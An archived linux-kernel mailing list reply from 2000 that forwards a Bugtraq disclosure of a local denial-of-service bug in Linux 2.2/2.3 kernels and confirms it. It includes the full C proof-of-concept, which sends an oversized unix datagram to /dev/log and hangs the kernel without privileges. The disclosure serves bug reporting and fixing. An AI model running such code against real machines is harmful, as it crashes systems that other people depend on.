Re: [fenlason@CLEARWAY.COM: Local Denial-of-Service attack against Linux]

From: Panu Matilainen (pmatilai@pp.htv.fi)
Date: Sat Mar 25 2000 - 12:44:35 EST

Next message: Erik Andersen: "Re: Nostalgia: System V Release 2 filesystem"
Previous message: Andreas Bombe: "Re: Avoiding OOM on overcommit...?"
In reply to: bert hubert: "[fenlason@CLEARWAY.COM: Local Denial-of-Service attack against Linux]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, 24 Mar 2000, bert hubert wrote:

> ----- Forwarded message from Jay Fenlason <fenlason@CLEARWAY.COM> -----
>
> X-Mailer: Mutt 1.0.1i
> Date: Thu, 23 Mar 2000 17:55:09 -0500
> From: Jay Fenlason <fenlason@CLEARWAY.COM>
> Subject: Local Denial-of-Service attack against Linux
> To: BUGTRAQ@SECURITYFOCUS.COM
>
> This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1),
> 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel)
> on my 6x86 scratch machine and our various Pentium development machines.
> Note that this does not require any special privileges.

Confirmed (as a normal user). Kernel is stock RH6.1 2.2.12-20.

- Panu -

>
> The send system call immediately puts the kernel in a loop spewing
> kmalloc: Size (131076) too large
> forever (or until you hit the reset button).
>
> Apparently unix domain sockets are ignoring the /proc/sys/net/core/wmem_max
> parameter, despite the documentation to the contrary. The fix should be
> simple, but I haven't had time to chase it down, and I'm not (usually) a
> Linux kernel developer.
>
> -- JF
>
> --- BEGIN INCLUDED SOURCE FILE ---
>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <string.h>
>
> char buf[128 * 1024];
>
> int main ( int argc, char **argv )
> {
> struct sockaddr SyslogAddr;
> int LogFile;
> int bufsize = sizeof(buf)-5;
> int i;
>
> for ( i = 0; i < bufsize; i++ )
> buf[i] = ' '+(i%95);
> buf[i] = '\0';
>
> SyslogAddr.sa_family = AF_UNIX;
> strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
> LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
> sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
> return 0;
> }
> --- END INCLUDED SOURCE FILE ---
>
>
> ----- End forwarded message -----
>
> --
> | http://www.rent-a-nerd.nl
> |
> | - U N I X -
> | Inspice et cautus eris - D11T'95
>
> -
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to majordomo@vger.rutgers.edu
> Please read the FAQ at http://www.tux.org/lkml/
>

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

Next message: Erik Andersen: "Re: Nostalgia: System V Release 2 filesystem"
Previous message: Andreas Bombe: "Re: Avoiding OOM on overcommit...?"
In reply to: bert hubert: "[fenlason@CLEARWAY.COM: Local Denial-of-Service attack against Linux]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b29 : Fri Mar 31 2000 - 21:00:15 EST